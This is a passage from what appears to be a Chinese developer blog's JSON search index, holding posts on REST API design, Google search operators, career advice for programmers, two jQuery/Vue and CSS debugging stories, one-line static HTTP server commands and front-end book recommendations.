https://florimond.dev/en/posts/2018/08/restful-api-design-13-best-practices-to-make-your-users-happy/ https://docs.microsoft.com/en-us/azure/architecture/best-practices/api-design https://github.com/Microsoft/api-guidelines/blob/master/Guidelines.md https://github.com/cocoajin/http-api-design-ZH_CN https://www.cnblogs.com/welan/p/9875103.html ","permalink":"https://wdd.js.org/posts/2019/10/irl0p4/","summary":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipedia\nREST API 不是一个标准,也不是一个协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向服务端请求此API,则您的客户端为RESTful。\n2. 
REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CRUD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts.","title":"Restful API 架构思考"},{"content":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和-之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看来没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2019/10/giflpm/","summary":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和-之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 
区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3.","title":"掌握谷歌搜索高级指令"},{"content":"1. 培训行业的现状和问题 进入培训班学习可能有以下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人单位不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典著作,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可能是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,只要你给出一个问题应该如何解决的思路,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,如果你不清楚这些知识点,就可能随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐以下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档仿佛如喝王老吉,消火又滋润。\nIT行业至今来说,仿佛还是个舶来品。所有的最新的文档都是英文的。但是也不乏有好的中文翻译文档,但是都是需要花时间去等待。而且英文文档也随着翻译者的水平而参差不齐。\n其实我们完全没必要去害怕英文文档,其实英文文档里最常用的单词往往是很固定的。又不是什么言情小说,总是让你摸不着头脑。\n你不想看英文文档,从本质上说,还是因为你懒。\n2.8. 
文档能力 大多数程序的文档都是写给自己看的,或者说大多数程序员的语文都是数学老师教的。这个其实很让看文档的人苦恼的。一个优秀的程序和框架,无一不是文档非常完善。因为文档的完善才能有利于文档的传播,才有利于解决问题。你的框架再牛逼,效率再如何高,没有人能看得懂,那也是没用的。闭门造车永远也搞不出好东西。\n关于如何写作文档,可以参考:如何写好技术文档?\n3. 总结 开放的思维,敢于接纳一些新事物 不断学习,不舍昼夜 记笔记,写博客,要给所有的努力留下记录 ","permalink":"https://wdd.js.org/posts/2019/10/vyu2rs/","summary":"1. 培训行业的现状和问题 进入培训班学习可能有以下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人单位不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典著作,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可能是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,只要你给出一个问题应该如何解决的思路,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,如果你不清楚这些知识点,就可能随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐以下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 
英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档仿佛如喝王老吉,消火又滋润。","title":"如何成为从培训班里出来的牛人?"},{"content":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让市场淘汰了一批ActionScript方面的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多数人认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招某一方面的专家。但是从个人的角度考虑,如果你在专业化的道路钻研得非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","permalink":"https://wdd.js.org/posts/2019/10/vpqfyr/","summary":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让市场淘汰了一批ActionScript方面的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多数人认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招某一方面的专家。但是从个人的角度考虑,如果你在专业化的道路钻研得非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 
世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","title":"你不知道的专业化道路"},{"content":"1. 问题1:chosen插件无法显示图标 问题现象:在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当他访问到这个页面时,他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说得好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西:媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑是视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 
问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。\n当userAge被jQuery改成14时,Vue实例中的userAge任然是12。当你输入userName时,Vue发现数据改变,触发虚拟DOM的重新渲染,同时也将userAge渲染成了12。\n总结:如果你在Vue项目中逼不得已使用jQuery, 你要知道这会导致哪些常见的问题,以及解决思路。\n3. 最后 我苦苦寻找诡异的bug原因,其实是我的无知。\n","permalink":"https://wdd.js.org/posts/2019/10/qmgxqm/","summary":"1. 
问题1:chosen插件无法显示图标 问题现象:在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 不知道为什么,这个多选框上面的图标不见了。我找了半天没有找到原因,然后我把我的机器的内网地址给我同事,让他访问我机器,当他访问到这个页面时,他的电脑上居然显示出了这个下拉框的图标。\n这是什么鬼?为什么同样的代码,在我的电脑上显示不出图标,但是在他的电脑上可以显示。有句名言说得好:没有什么bug是一遍调试解决不了的,如果有,就再仔细调试一遍。于是我就再次调试一遍。\n我发现了一些第一遍没有注意到的东西:媒体查询,就是在css里有这样的语句:\n@media 从这里作为切入口,我发现:媒体查询的类会覆盖它原生的类的属性\n由于我的电脑是视网膜屏幕,分辨率比较高,触发了媒体查询,这就导致了媒体查询的类覆盖了原生的类。而覆盖后的类,使用了chosen-sprite@2x.png作为图标的背景图片。但是这个图片并没有被放在这个插件的目录下,有的只有chosen-sprite.png这个图片。在一般情况下,都是用chosen-sprite.png作为背景图片的。这就解释了:为什么同事的电脑上出现了图标,但是我的电脑上没有出现这个图标。\n总结: 如果你要使用一个插件,你最好把这个插件的所有文件都放在同一个目录下。而不要只放一些你认为有用的文件。最后:媒体查询的相关知识也是必要的。\n2. 问题2:jQuery 与 Vue之间的暧昧 jQuery流派代表着直接操纵DOM的流派,Vue流派代表着操纵数据的流派。\n如果在项目里,你使用了一些jQuery插件,也使用了Vue,这就可能导致一些问题。\n举个例子:\n\u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/vue/2.4.4/vue.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;script src=\u0026#34;https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; 姓名 \u0026lt;input type=\u0026#34;text\u0026#34; v-model=\u0026#34;userName\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; 年龄 \u0026lt;input type=\u0026#34;text\u0026#34; id=\u0026#34;userAge\u0026#34; v-model=\u0026#34;userAge\u0026#34;\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; new Vue({ el: \u0026#39;#app\u0026#39;, data: { userName: \u0026#39;\u0026#39;, userAge: 12 } }); $(\u0026#39;#userAge\u0026#39;).val(14); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 在页面刚打开时:姓名输入框是空的,年龄输入框是14。但是一旦你在姓名输入框输入任何字符时,年龄输入框的值就会变成12。\n如果你仔细看过Vue官方文档,你会很容易定位问题所在。\nv-model 会忽略所有表单元素的 value、checked、selected 特性的初始值。因为它会选择 Vue 实例数据来作为具体的值。你应该通过 JavaScript 在组件的 data 选项中声明初始值。---Vue官方文档 你可以用 v-model 
指令在表单控件元素上创建双向数据绑定。它会根据控件类型自动选取正确的方法来更新元素。尽管有些神奇,但 v-model 本质上不过是语法糖,它负责监听用户的输入事件以更新数据,并特别处理一些极端的例子。","title":"我苦苦寻找诡异的bug原因,其实是我的无知"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs\n2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2019/10/hvqggd/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 
127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。\n","permalink":"https://wdd.js.org/fe/gitbook-good-book/","summary":"1. 
